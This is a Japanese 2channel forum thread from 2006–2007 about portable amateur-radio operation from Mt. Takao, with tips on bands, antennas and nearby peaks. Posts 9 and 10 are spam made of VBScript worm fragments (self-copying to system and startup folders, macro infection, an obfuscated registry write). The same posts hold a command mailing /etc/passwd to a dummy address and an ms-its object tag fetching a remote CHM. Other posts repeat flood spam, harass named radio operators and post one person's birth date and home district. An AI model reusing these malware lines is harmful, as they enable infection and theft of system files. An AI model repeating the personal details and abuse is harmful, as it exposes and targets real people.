5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

   高尾山からアウトドア移動運用   

1 :名無しさんから2ch各局…:2006/11/26(日) 00:44:02
したいよな

2 :赤城山から運用:2006/11/26(日) 00:44:57
P5のDXerだぁのお部屋

http://0bbs.jp/je1syn/

祖国の土を踏まぬ間に1972年3月から35年の歳月が経っていました。保存しておきたい将軍様の画像や資料などをこちらに掲載して参ります。
画像等について共和国の所有権を宣言致します、勝手に転載を禁止致しますが、ご利用の場合はメール等で焼き場まで連絡下さい。SYNOP。

http://www.k2.dion.ne.jp/~t_ikeda/
http://blogs.dion.ne.jp/dxer/
http://page.freett.com/nickyama2/maebashi021.jpg
http://zumatsu.hp.infoseek.co.jp/2005Hamfair/IMGP00791.jpg
http://zumatsu.hp.infoseek.co.jp/2005Hamfair/IMGP00991.jpg
http://www001.upp.so-net.ne.jp/takahashi/photo/je1syn102.JPG
http://dxxxxx.hp.infoseek.co.jp/img040821/P10105971.jpg
http://tgc.jp-au.net/member.htm
http://543.teacup.com/tgc/bbs
http://www.maeko-hs.gsn.ed.jp/

3 :名無しさんから2ch各局…:2006/11/26(日) 00:45:52
>>1
ワロタ

そのまんまやんw

4 :名無しさんから2ch各局…:2006/11/26(日) 01:28:05
山は、甘く見るな!
山に登れば遭難の恐れが、有り
遭難を避けても、スズメバチの餌食に、為る!
山の天気は、代わりやすいので、雨、風ならまだましで、雷の恐れが有り
落石も考えられる!
山での移動運用は、命知らずの行く所だぞ!
命を大切にしろ山は、やめろ!

5 :名無しさんから2ch各局…:2006/11/26(日) 12:31:51
展望台使えん残念
尼は他でやって

6 :名無しさんから2ch各局…:2006/11/26(日) 12:46:40
高尾さん、高尾山で移動運用して保水w

7 :名無しさんから2ch各局…:2006/11/26(日) 15:00:43
先週、今週は紅葉を見に来る人で山頂は大賑わい。
とても無線なんぞできる環境ではなかった。
12月からはもみじ台、稲荷山コースが閉鎖されるから、
運用するなら小仏城山まで行って
無線中継所脇の茶屋をベースにするのがいいと思う。
健脚の人は景信山まで足を延すのもいいかもね。

8 :R7DXN 煮海女親爺:2006/11/26(日) 15:05:38
<<<<<<<OVER POWER 200Wer!>>>>>>>

9 :名無しさんから2ch各局…:2006/11/26(日) 15:33:31
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.Copy^^^^File f1.path, f1.path+"l"
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

10 :名無しさんから2ch各局…:2006/11/26(日) 15:34:07
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)


11 :名無しさんから2ch各局…:2006/11/26(日) 15:34:39
P5のDXerだぁのお部屋

http://0bbs.jp/je1syn/

祖国の土を踏まぬ間に1972年3月から35年の歳月が経っていました。保存しておきたい将軍様の画像や資料などをこちらに掲載して参ります。
画像等について共和国の所有権を宣言致します、勝手に転載を禁止致しますが、ご利用の場合はメール等で焼き場まで連絡下さい。SYNOP。

http://www.k2.dion.ne.jp/~t_ikeda/
http://blogs.dion.ne.jp/dxer/
http://page.freett.com/nickyama2/maebashi021.jpg
http://zumatsu.hp.infoseek.co.jp/2005Hamfair/IMGP00791.jpg
http://zumatsu.hp.infoseek.co.jp/2005Hamfair/IMGP00991.jpg
http://www001.upp.so-net.ne.jp/takahashi/photo/je1syn102.JPG
http://dxxxxx.hp.infoseek.co.jp/img040821/P10105971.jpg
http://tgc.jp-au.net/member.htm
http://543.teacup.com/tgc/bbs
http://www.maeko-hs.gsn.ed.jp/

12 :名無しさんから2ch各局…:2006/11/26(日) 16:58:39
高尾山は、都会側へのロケはいいけど
他があまりよりしく無い
2,3,0エリア狙う場合は、上って少し歩かないと行けないからな
そんな元気ありません

13 :名無しさんから2ch各局…:2006/11/26(日) 17:12:51
30年前にリアル厨房だったときにRJX601持って
ロッドアンテナで作ったDPで移動いたのを思い出した。


14 :名無しさんから2ch各局…:2006/11/26(日) 20:48:00
高尾山ってやっぱこの人のこと?

http://www.out-door.jp/

15 :名無しさんから2ch各局…:2006/11/27(月) 00:11:14
>>12
以外に知られていないが、頂上から西方面に富士山が見えるよ。

16 :名無しさんから2ch各局…:2006/12/04(月) 22:55:05
移動運用するなら御岳山のほうがいいっすよ。高尾よりも全然飛ぶから。

17 :名無しさんから2ch各局…:2006/12/05(火) 00:12:39
移動運用するなら大岳山のほうがいいっすよ。御岳よりも全然飛ぶから。

18 :名無しさんから2ch各局…:2006/12/06(水) 17:16:50
http://c-others.2ch.net/test/-/sec2chd/1165312973/l50

19 :名無しさんから2ch各局…:2006/12/06(水) 17:22:12
K○Cのスレに持っていこうという露骨な意図で立てられたスレだが、
全く狙い通りに逝きませんでしたね

大外し m9(^Д^)プギャー

20 :名無しさんから2ch各局…:2006/12/06(水) 18:43:28
7J3AOZ http://hobby8.2ch.net/test/read.cgi/radio/1162016136/
JA1KSO http://hobby8.2ch.net/test/read.cgi/radio/1140229039/
JA3AVO http://hobby8.2ch.net/test/read.cgi/radio/1163255888/
JE1BMJ http://hobby8.2ch.net/test/read.cgi/radio/1158733606/
JE1SYN http://hobby8.2ch.net/test/read.cgi/radio/1146284694/
JM1LJS JE1CKA http://hobby8.2ch.net/test/read.cgi/radio/1164800426/
JR1CBC http://hobby8.2ch.net/test/read.cgi/radio/1155512519/
JA1AN http://hobby8.2ch.net/test/read.cgi/radio/1156170626/
JA1VJQ http://hobby8.2ch.net/test/read.cgi/radio/1131950334/
JQ1FEF http://hobby8.2ch.net/test/read.cgi/radio/1147227003/
JA3VAP http://hobby8.2ch.net/test/read.cgi/radio/1101806320/
JG8NID http://hobby8.2ch.net/test/read.cgi/radio/1118471179/
JH0IXE JG3DOR JL3TOG http://hobby8.2ch.net/test/read.cgi/radio/1163661596/ ←真打ち!


21 :名無しさんから2ch各局…:2006/12/15(金) 19:34:53
明日、高尾山から6mで運用します、各局よろしくお願いします

22 :名無しさんから2ch各局…:2006/12/15(金) 19:58:52
6mはSSB?FM?AM?
久々に電源入れてみるから。

23 :名無しさんから2ch各局…:2006/12/15(金) 21:16:12
自然界でオナニー電波公害出さないで下さい

24 :名無しさんから2ch各局…:2006/12/16(土) 01:00:36
高尾さんってイケメンに分類されるよね?

25 :名無しさんから2ch各局…:2006/12/26(火) 22:32:30
石田純一

26 :名無しさんから2ch各局…:2006/12/28(木) 21:06:57
しかし山岳移動もメッキリ減ったね。
初詣がてらに高尾からでもやってみますわ。

27 :名無しさんから2ch各局…:2006/12/28(木) 21:14:00
森本レオ

28 :名無しさんから2ch各局…:2006/12/28(木) 21:14:26
明治神宮から出てください。

29 :名無しさんから2ch各局…:2006/12/29(金) 23:08:00
よし決めた、俺も男の端くれだ。高尾からCQ明治神宮を出してやる。必ず応答しろや。

30 :名無しさんから2ch各局…:2006/12/29(金) 23:18:48
 

31 :名無しさんから2ch各局…:2007/01/06(土) 09:56:24
>>29 本当に高尾からCQ出してたやん。応答しなかったけど(爆)

32 :JA1ADFGG:2007/01/29(月) 14:30:58
高尾山は電波良く飛ぶよ144MHZとか50MHZの移動がいいみたいだ

33 :JA1ADFGG:2007/01/29(月) 14:34:16
最低でもマスプロの八木くらいは必要
だから

34 :名無しさんから2ch各局…:2007/01/29(月) 17:27:16
>>最低でもマスプロの八木くらいは・・・
最高だったら何?

35 :名無しさんから2ch各局…:2007/01/29(月) 19:00:53
いくら登山が楽でも担ぎは大変だね。
以前8エレスタック持って行ったらシンドイのなんのって。
ちなみに高尾と御嶽山(青梅)ではどちらが良く飛んでいきますか?

36 :105:2007/01/29(月) 22:28:07
8エレスタックは6mですかぁ。ひとりじゃ無理でしょ。

37 :名無しさんから2ch各局…:2007/01/29(月) 23:24:40
22歳の頃に一人で車載用バッテリーとアンテナ一式担いで高尾に行きました。
行く時は頑張ったんですが帰りが酷く疲れた。山頂の外れで騒いだ割には
大して遠くとは交信できなかった。
車が横付けできないところに行く時はハンディー機等に限ると思いました。


38 :渋谷の研究所から送信中:2007/02/01(木) 22:09:40
http://www.roar-j.jp/
日本ロータリーハムクラブHP

http://www.roar-j.jp/riji/index.html
DKAは無線局運営委員長(役員)

http://www.tele.soumu.go.jp/menkyo/SearchServlet?IT=A&HZ=3&OX=AT+&MA=JF1DKA&OW=AT+0&DC=10&pageID=3&DF=0001444166&styleNumber=50
4アマキロワッターのDKA

CQ誌2002年1月号のドクター(DKA)の取材記事で
ドクターが2000Fと一緒に写っていてた。総通晒を見ると4アマ
オーバーパワー疑惑が持ちあがった

2006年6月某日の日本ロータリーハムクラブ電波定例のキー局はDKA
(平日7:30-8:15 7.077.5MHz LSB で行われいる)
2週間ぐらい前からネットで「4アマ`ワッターが出るぞ」と
ボコボコに叩かれたのに関わらず、当日堂々と出てきた
4アマなのに100w局よりも波が強かった
これでオーバーパワーが確定した

6月某日のことでボコボコに叩かれたことが原因か、
その後キー局でDKAが当たることはなくなった

4アマ`ワッターが無線局運営委員長を務める日本ロータリーハムクラブはさっさと解散しろ!
日本音響研究所はなくなれ!
DKAは廃局しろ!
4アマ無線局運営委員長なんて4アマ監査指導員と同じだ!

39 :sage:2007/02/01(木) 22:48:22
荒らしがここにも。

40 :名無しさんから2ch各局…:2007/02/02(金) 23:21:50
移動で遊ぶには東京じゃ高尾山か御岳山がいいのかな?
多摩丘陵なんかの高台や他で遊べる場所知らないですか?

41 :名無しさんから2ch各局…:2007/02/05(月) 11:01:05
アオカンプレーだったらオレの家の裏山でどうぞ

42 :名無しさんから2ch各局…:2007/02/05(月) 11:26:09
オナニープレーでもokよ

43 :名無しさんから2ch各局…:2007/02/05(月) 12:07:06
浣腸プレーでつが桶でつか?

44 :名無しさんから2ch各局…:2007/02/05(月) 12:09:22
汚いからダメでつ!!

45 :名無しさんから2ch各局…:2007/02/05(月) 12:40:04
西方面なら高尾が良いかと、東方面なら御岳がいいのでは?
アクセスは高尾がよし。

46 :JD2KHN:2007/02/05(月) 15:59:54
高尾は2M、430がすげえ良く飛ぶよCQ出すとパイルに遭うよ。

47 :名無しさんから2ch各局…:2007/02/05(月) 20:40:27
2mと430のメインをクロスバンドレピータにしてくれw

48 :名無しさんから2ch各局…:2007/02/16(金) 20:49:26
天気の良い日に山頂行くと無線機持った人結構多いね。
最近は特小マンがいるいる。。。

49 :名無しさんから2ch各局…:2007/03/05(月) 00:45:32
まだ山の上は寒いからヤダね。

50 :名無しさんから2ch各局…:2007/03/05(月) 09:12:47
移動CQばかりやっるオヤジは捨てられるぞ


離婚時の厚生年金の分割制度について

離婚時の厚生年金の分割制度は、平成19年4月1日以後に離婚等をした場合において、
離婚等をした当事者間の合意や裁判手続により按分割合を定めたときに、その当事者の
一方からの請求によって、婚姻期間等の保険料納付記録を当事者間で分割することがで
きる制度です。

以下省略

ttp://www.sia.go.jp/topics/2006/n1003.html



51 :名無しさんから2ch各局…:2007/03/06(火) 20:47:40
>>50
簡単に言うと4月から離婚すると年金は完全に2分割になりますよ

52 :名無しさんから2ch各局…:2007/03/06(火) 20:55:57
コーラを買って自販器から電源おかりします。

53 :名無しさんから2ch各局:2007/03/06(火) 21:03:00
今年の総会ネタはなににしようかな
AEDはもうやっちゃったし

何がいいか、おせーてー

54 :名無しさんから2ch各局…:2007/03/07(水) 20:34:47
高尾さん乙
売名行為はいいけげんやめれ

55 :名無しさんから2ch各局…:2007/03/09(金) 23:25:09
ハイカーの晒し者。隅っこで電信でもヤッテロ
どう間違っても「ごときゅう バイザビューロー」とかほざくな。
ああ恥ずかしい。

56 :名無しさんから2ch各局…:2007/03/10(土) 08:45:59
本日、高尾山から10m、6mで運用予定です。各局よろしくです。

57 :名無しさんから2ch各局…:2007/03/10(土) 11:23:58
明日から城山町と藤野町は消滅なのか。移動にいけばよかったな。呼ばれたかも。

58 :名無しさんから2ch各局…:2007/04/01(日) 11:17:23
これから登ります

59 :名無しさんから2ch各局…:2007/04/02(月) 19:48:41

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JA1ELY を代理人として出しましょう!




60 :名無しさんから2ch各局…:2007/04/04(水) 19:46:57

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JA1ELY を代理人として出しましょう!




61 :名無しさんから2ch各局…:2007/04/04(水) 20:02:34

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾山 を代理人として出しましょう!





62 :名無しさんから2ch各局…:2007/04/04(水) 20:03:12

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾を代理人として出しましょう!





63 :名無しさんから2ch各局…:2007/04/04(水) 20:03:44

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾を代理人として出しましょう!





64 :名無しさんから2ch各局…:2007/04/05(木) 00:13:14

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾を代理人として出しましょう!



65 :名無しさんから2ch各局…:2007/04/05(木) 01:25:20

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾を代理人として出しましょう!




66 :名無しさんから2ch各局…:2007/04/07(土) 21:42:33
筑波山の道路下に毛布でくるんだ遺体、死体遺棄で捜査(読売新聞)

7日午後2時20分ごろ、茨城県つくば市筑波の筑波山中で、放置されていた毛布から
人間の後頭部のようなものが露出しているのを、山菜採りに来ていた近くの女性(58)
が見つけ、連絡を受けた近所の男性(72)がつくば北署に通報した。

同署員が駆けつけると、遺体が毛布にくるまれていた。同署は遺体の身元の確認を急ぐ
とともに、死体遺棄事件として捜査を始めた。

現場は県道笠間つくば線沿いで、遺体は道路から約6メートル下の斜面にあった。


[読売新聞社:2007年04月07日 21時36分]


67 :名無しさんから2ch各局…:2007/04/07(土) 21:45:17
委任状は草野か高尾か、マジで迷ってます♪
こうなったら現職理事への委任はそれが誰であろうが愚の骨頂だし。
さりとて関西勢力に委任状やるのも基地外ざただし。

68 :名無しさんから2ch各局…:2007/04/07(土) 21:58:35
高尾山には今でも警察無線のレピがあるんか?

69 :名無しさんから2ch各局…:2007/04/09(月) 17:41:25
筑波山の遺体発見現場

でVR−150発見

70 :名無しさんから2ch各局…:2007/04/10(火) 13:32:01

筑波山でこの前パラグライダーの大会あったろ

71 :名無しさんから2ch各局…:2007/04/11(水) 01:17:11

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾を代理人として出しましょう!





72 :名無しさんから2ch各局…:2007/04/11(水) 14:03:53
こうなったら高尾か草野の2択だな

かなりしょうもない2択だが

73 :名無しさんから2ch各局…:2007/04/11(水) 14:07:02
白票が吉w

74 :名無しさんから2ch各局…:2007/04/11(水) 14:12:49
白票→腹黒執行部への委任

75 :名無しさんから2ch各局…:2007/04/11(水) 15:50:44
>>71
更に悪化させるだけだろ、キミは側近の蝶クンか?

76 :名無しさんから2ch各局…:2007/04/11(水) 16:23:17
蝶ではありません蠅ですが何か?

77 :蝶ではありません:2007/04/11(水) 19:39:16

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾を代理人として出しましょう!




78 :名無しさんから2ch各局…:2007/04/11(水) 19:39:52
高尾か〜。 迷うな〜。

79 :迷わずに入れて:2007/04/11(水) 19:40:41

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾を代理人として出しましょう!







80 :来年の理事選もお願いします:2007/04/11(水) 19:41:43

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾を代理人として出しましょう!


81 :JG1KTC:2007/04/11(水) 19:45:06
JG1KTC
JG1KTC
JG1KTC
JG1KTC
JG1KTC
JG1KTC
JG1KTC
JG1KTC
JG1KTC

82 :JG1KTC:2007/04/11(水) 19:45:43
JG1KTC
JG1KTC
JG1KTC
JG1KTC
JG1KTC
JG1KTC
JG1KTC
JG1KTC
JG1KTC


83 :名無しさんからJG1KTC各局…:2007/04/11(水) 19:48:40
JARL総会の委任状は JG1KTC
JARL総会の委任状は JG1KTC
JARL総会の委任状は JG1KTC
JARL総会の委任状は JG1KTC
JARL総会の委任状は JG1KTC
JARL総会の委任状は JG1KTC
JARL総会の委任状は JG1KTC
JARL総会の委任状は JG1KTC
JARL総会の委任状は JG1KTC
JARL総会の委任状は JG1KTC
JARL総会の委任状は JG1KTC
JARL総会の委任状は JG1KTC

84 :名無しさんから2ch各局…:2007/04/11(水) 19:50:16
草野は去年は200票以上集めて欠席か
やっぱJG1KTC高尾山しかいない
 
草野は去年は200票以上集めて欠席か
やっぱJG1KTC高尾山しかいない
 
草野は去年は200票以上集めて欠席か
やっぱJG1KTC高尾山しかいない

85 :名無しさんから2ch各局…:2007/04/11(水) 19:54:49
草野さんもいいけど高尾山もいいとおもった
俺もJG1KTCと書いておくったよ
out-door@nifty.com


86 :名無しさんから2ch各局…:2007/04/11(水) 20:00:36
だけど高尾はPLC問題には一切質問をしない可能性が高いぞ

87 :名無しさんから2ch各局…:2007/04/11(水) 20:15:12
生理的にありゃ好かん

88 :名無しさんから2ch各局…:2007/04/11(水) 23:33:50

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾を代理人として出しましょう!




89 :名無しさんから2ch各局…:2007/04/13(金) 07:21:34
++++++++++++++++

私は、中村イチローさんを支持します

++++++++++++++++

90 :名無しさんから2ch各局…:2007/04/14(土) 10:34:44

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾義則 様を代理人として出しましょう!






91 :名無しさんから2ch各局…:2007/04/14(土) 10:41:14

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様を代理人として出しましょう!


92 :名無しさんから2ch各局…:2007/04/14(土) 10:58:33

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様を代理人として出しましょう!



93 :名無しさんから2ch各局…:2007/04/14(土) 11:06:37

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様を代理人として出しましょう!




94 :名無しさんから2ch各局…:2007/04/14(土) 11:10:41
草野は去年は200票以上集めて欠席か
やっぱJG1KTC高尾山しかいない
 
草野は去年は200票以上集めて欠席か
やっぱJG1KTC高尾山しかいない
 
草野は去年は200票以上集めて欠席か
やっぱJG1KTC高尾山しかいない




95 :名無しさんから2ch各局…:2007/04/14(土) 11:23:09

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様を代理人として出しましょう!



96 :名無しさんから2ch各局…:2007/04/15(日) 13:29:14

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様を代理人として出しましょう!




97 :名無しさんから2ch各局…:2007/04/15(日) 14:02:48
春になると変なヤシのお出ましや

嫌われもんJH0IXE相宮良成しかねえだろ
死ななきゃ治らんな奴は
いい年こいて哀れやな


98 :名無しさんから2ch各局…:2007/04/15(日) 14:03:40
草野は去年は200票以上集めて欠席か
やっぱJG1KTC高尾山しかいない
 
草野は去年は200票以上集めて欠席か
やっぱJG1KTC高尾山しかいない
 
草野は去年は200票以上集めて欠席か
やっぱJG1KTC高尾山しかいない




99 :名無しさんから2ch各局…:2007/04/15(日) 14:03:55
>>97
JH0IXE相宮良成のやっかみか

100 :名無しさんから2ch各局…:2007/04/15(日) 14:04:56
606 :名無しさんから2ch各局…:2007/04/14(土) 13:54:00
JJ0KTX 古賀だろ
いいかげんにしろ


101 :名無しさんから2ch各局…:2007/04/15(日) 14:06:00

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様を代理人として出しましょう!




102 :名無しさんから2ch各局…:2007/04/15(日) 14:07:18
JI5SAO竿でつ

103 :名無しさんから2ch各局…:2007/04/15(日) 14:13:50
JIS5A0さんのプロフィール
性別: 男性
生年月日: 1962年07月25日
血液型: A型
現住所: 香川県 高松市亀田町
出身地: 香川県 小豆郡土庄町
職業: 技術系
結婚: 未婚
趣味: アニメ インターネット ゲーム 音楽鑑賞 テレビ アマチュア無線 映画鑑賞
JARL総会の委任状を高尾を代理人として出すことが趣味

104 :名無しさんから2ch各局…:2007/04/15(日) 14:22:40

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様を代理人として出しましょう!




105 :名無しさんから2ch各局…:2007/04/15(日) 14:40:09

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様を代理人として出しましょう!





106 :名無しさんから2ch各局…:2007/04/15(日) 14:54:16
基地害信者か?

107 :名無しさんから2ch各局…:2007/04/15(日) 15:04:54
昔、大山に移動したことがある。
50MHzAMで結構飛んだな。
なによりも嬉しかったのはノイズが全く無いこと。
こんなに感度が良かったかと・・・


108 :名無しさんから2ch各局…:2007/04/15(日) 15:37:18
JH0IXE相宮良成 いい年してみっともないぞ
いい加減にしろ!


109 :名無しさんから2ch各局…:2007/04/15(日) 16:47:21
JJ0KTX 古賀 いい年してみっともないぞ
いい加減にしろ!


110 :名無しさんから2ch各局…:2007/04/15(日) 16:54:27

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様を代理人として出しましょう!



111 :名無しさんから2ch各局:2007/04/15(日) 17:09:46
JARL総会の委任状は難で JG1KTC 高尾義則だ、
何者だ???偉雷乃家。

112 :名無しさんから2ch各局…:2007/04/15(日) 19:42:29
>>107
確かにFMに比べると快感はありますよね。何か「無線をしてる」みたいな感覚ですね。

113 :名無しさんから2ch各局…:2007/04/17(火) 22:47:53
わかる わかる でもAMは古いな、と言うかアマ無線の山岳移動自体古いか?

114 :名無しさんから2ch各局…:2007/04/17(火) 22:56:01
AMってナウでかっこいいエアーモービルのことだよ。



本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾義則 様を代理人として出しましょう!




115 :名無しさんから2ch各局…:2007/04/17(火) 23:38:14
エアーモービルのことだったのか。


116 :名無しさんから2ch各局…:2007/04/22(日) 10:05:06
これから登ります。各局よろしくです。

117 :来年の東京都支部長立候補:2007/04/30(月) 08:49:35
皆さんお元気ですか.JG1KTC高尾です.
この案内は,bccにて皆様にお送りしております.
いつもお世話になっております.
ゴールデンウイークはいかがお過ごしでしょうか.
オールJAコンテストはいかがですか.
委任状もお送りいただきありがとうございます.
さあ春全開,アウト・ドア無線情報をお届けします.

★CQ誌5月号巻頭特集をJG1KTCが執筆
★第15回移動運用セミナー開講
★アウト・ドアコンテスト開催
★今年もJARL主催コンテスト楯ドナーに
★JARL総会に出席しましょう
(中略)
★JARL総会に出席しましょう
今年も,JARL総会が5月20日に岡山県倉敷で開催されます.
会員数激減が続くJARL,毎年取り崩される終身会員積立金も底を
つくようになりました.さらに今年は,公益法人改革に関連し代議員
制度などの制定,定款の改正も上程される可能性大です.
知らないうちに今年がJARL総会最後の年となってしまうことも否定
できません.PLC関連など重要案件なども審議されます.
ひとりでも多くの会員の皆さんの出席を切望します.やむなく欠席さ
れる場合,白紙委任状の提出は絶対に避けるようにしましょう.
詳細は http://www.out-door.jp/

118 :来年の東京都支部長立候補:2007/04/30(月) 08:50:54

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様
JARL総会の委任状は JG1KTC 高尾義則 様を代理人として出しましょう!




119 :名無しさんから2ch各局…:2007/04/30(月) 08:58:48
本間さんのアボーンで一気に役員の可能性がてきたな

120 :名無しさんから2ch各局…:2007/04/30(月) 22:17:42
八木が良いのかGPが良いのか…
それにしても支柱をどうするか悩み中
三脚用の雲台のアタッチメントとかってあったっけ?

121 :名無しさんから2ch各局…:2007/04/30(月) 23:04:34
おい>>1アウトドアのはずが無いだろ無線だぞ

移動だろうがヒキコモリヲタだ

122 :名無しさんから2ch各局…:2007/05/04(金) 19:54:35
http://bbs1.on.kidd.jp/?0002/outdoor2

D*Sロカトピ・・ K*C大丈夫・・
おまいらBBSで掲載承諾の相談かよ 
どおりで毎月載ってる訳だ<D*S

高尾のページにDOS登場

123 :名無しさんから2ch各局…:2007/05/07(月) 22:39:25
>>119
798 :名無しさんから2ch各局…:2007/05/07(月) 22:33:31

本当にアマチュア無線と腐ったJARLを何とかしたければ

JARL東京都支部長の補欠選挙は JG1KTC 高尾義則 様

に投票しましょう!


124 :名無しさんから2ch各局…:2007/05/12(土) 01:51:19
高尾山頂から富士山に小型ビーム向けただけで凄い飛ぶよ。

125 :名無しさんから2ch各局…:2007/05/13(日) 00:53:36
>>123 アホ〜支部大会来ない奴じゃね〜か!!

126 :名無しさんから2ch各局…:2007/05/15(火) 23:45:17
>>124
